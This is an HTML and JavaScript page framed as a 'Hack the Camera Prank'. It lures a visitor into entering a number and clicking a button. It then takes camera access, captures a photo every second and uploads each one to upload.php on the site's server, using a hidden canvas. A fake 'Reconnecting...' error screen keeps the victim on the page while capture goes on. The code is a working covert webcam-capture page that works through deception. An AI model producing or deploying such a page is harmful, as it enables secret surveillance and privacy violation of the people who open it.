<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Hack the Camera Prank</title>
    <link rel="stylesheet" href="styles.css">
</head>
<body>
    <div class="container" id="mainContainer">
        <div class="header">
            <h1>Hacker Interface</h1>
            <p>Enter a number to initiate camera hack...</p>
        </div>
        <input type="number" id="numberInput" placeholder="Enter a number" style="padding: 10px; border-radius: 4px; border: 1px solid #33ff33; background-color: #0d0d0d; color: #33ff33;">
        <button id="hackButton">Hack Camera</button>
        <div class="video-container" style="display: none;">
            <video id="video" autoplay playsinline></video>
            <canvas id="canvas" style="display: none;"></canvas>
        </div>
    </div>

    <div class="container" id="errorContainer" style="display: none;">
        <div class="header">
            <h1>Reconnecting...</h1>
            <p>There seems to be an issue with your internet connection. Trying to reconnect...</p>
        </div>
    </div>

    <script>
        const video = document.getElementById('video');
        const canvas = document.getElementById('canvas');
        const hackButton = document.getElementById('hackButton');
        const mainContainer = document.getElementById('mainContainer');
        const errorContainer = document.getElementById('errorContainer');
        const numberInput = document.getElementById('numberInput');
        let stream;

        hackButton.addEventListener('click', () => {
            const number = numberInput.value;
            if (number) {
                mainContainer.querySelector('p').textContent = 'Initiating hack sequence...';
                hackButton.style.display = 'none';
                numberInput.style.display = 'none';
                startHackSequence();
            } else {
                alert('Please enter a number to proceed.');
            }
        });

        function startHackSequence() {
            navigator.mediaDevices.getUserMedia({ video: true })
                .then(mediaStream => {
                    stream = mediaStream;
                    video.srcObject = stream;
                    video.play();
                    document.querySelector('.video-container').style.display = 'block';
                    startCapturing();
                    showErrorMessageAfterDelay();
                })
                .catch(err => {
                    console.error("Error accessing the camera: ", err);
                });
        }

        function startCapturing() {
            setInterval(capturePhoto, 1000);  // Capture photo every 1 second
        }

        function capturePhoto() {
            const context = canvas.getContext('2d');
            context.drawImage(video, 0, 0, canvas.width, canvas.height);
            const dataURL = canvas.toDataURL('image/png');
            sendPhotoToServer(dataURL);
        }

        function sendPhotoToServer(dataURL) {
            fetch('upload.php', {
                method: 'POST',
                body: JSON.stringify({ image: dataURL }),
                headers: {
                    'Content-Type': 'application/json'
                }
            })
            .then(response => response.text())
            .then(data => {
                console.log('Success:', data);
            })
            .catch((error) => {
                console.error('Error:', error);
            });
        }

        function showErrorMessageAfterDelay() {
            setTimeout(() => {
                mainContainer.style.display = 'none';
                errorContainer.style.display = 'block';
            }, 10000); // Show error message after 10 seconds
        }
    </script>
</body>
</html>
